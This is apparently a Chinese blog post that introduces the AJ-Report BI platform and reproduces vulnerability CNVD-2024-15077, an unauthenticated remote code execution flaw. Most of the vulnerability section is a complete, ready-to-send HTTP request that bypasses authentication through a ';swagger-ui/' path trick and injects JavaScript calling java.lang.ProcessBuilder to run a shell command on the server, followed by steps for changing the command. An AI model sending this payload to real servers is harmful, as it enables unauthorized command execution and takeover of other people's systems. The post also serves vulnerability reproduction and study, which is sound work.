当前位置: 首页 > news >正文

AJ-Report - 实践

目录

AJ-Report是什么

 CNVD-2024-15077(AJ-Report认证绕过和远程代码执行漏洞)


AJ-Report是什么

        AJ-Report是完全开源的BI(Business intelligence)平台,旨在帮忙用户生成和管理各种类型的报表。它通常用于web应用中,用于分析和展示数据,常用于企业和数据密集型框架中。AJ-Report支持多种便捷功能。

  • 报表设计器:允许用户通过图形化界面设计报表,无需编写复杂的代码。
  • 数据源支持:可以与数据库、API 等多种数据源连接,支持多种数据格式(如 SQL、NoSQL 等)。
  • 可定制性:支持定制报表的布局、样式、格式等,满足不同的业务需求。
  • 导出功能:用户能够将生成的报表导出为 PDF、Excel 等格式,便于分享和存档。

 CNVD-2024-15077(AJ-Report认证绕过和远程代码执行漏洞)

        漏洞成因:verification方法未对传入的参数进行过滤,允许执行JavaScript函数。导致命令执行漏洞。代码使用engine.eval(validationRules)执行传入的validationRules字符串。validationRules字符串可来自用户输入,没有对用户输入做验证和清理,恶意用户可构造恶意的JavaScript代码传递给validationRules,从而在服务器上执行恶意命令。

版本要求:AJ-Report < 1.4.0

账号要求:无需登录,无需账号。

步骤1:构造数据包如下

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339{"ParamName":"",
"paramDesc":"",
"paramType":"",
"sampleItem":"1",
"mandatory":true,
"requiredFlag":1,
"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

调用Swagger UI 接口发送的POST数据包,以JSON格式传递数据,在key为validationRules中构造命令。

步骤2:查看结果

切换命令测试

http://www.jsqmd.com/news/10102/

相关文章:

  • 视频采集程序
  • java作业2
  • 关于PPT的课后作业
  • RK 系列 GPU 驱动检查方法
  • Day-15【选择与循环】选择结构-if语句 - 实践
  • 咕乡
  • opencv应用经典bug
  • Linux随记(十八) - 详解
  • 通信算法之281:大疆DJI无人机ID-DJI DroneID开源工程-相关问题-协议信息问题 - 实践
  • Linux 文件 MD5 校验完全指南
  • week2课后作业
  • Java 语言程序设计(第二讲 方法)动手动脑与课后实验问题整理文档 - 20243867孙堃2405
  • 算法第一章
  • 课后作业1
  • mac打开app提示文件损坏解决方案
  • 深入解析:RDMA简介3之四种子协议对比
  • QBXT2025S刷题 Day7题
  • 大语言模型中的注意力机制详解 - 教程
  • 无需重新训练即可更新语音识别词汇
  • 深入解析:vscode中无法使用npm node
  • 第一次算法作业
  • AI元人文:新的评价与启示
  • Why is English commonly used in scientific literature?
  • 第二次课程
  • 详细介绍:《云原生安全攻防》-- K8s网络策略:通过NetworkPolicy实现微隔离
  • 考研系列—操作系统:冲刺笔记(1-3章) - 指南
  • 【Axure高保真原型】交通事故大屏可视化分析案例 - 指南
  • 2025工业网线优质厂家最新推荐榜:品质卓越与技术领先之选
  • 上海殡葬一条龙服务最新推荐:专业关怀与人性化服务口碑之选
  • 中空扳手实力厂家最新推荐榜:专业制造与耐用品质深度解析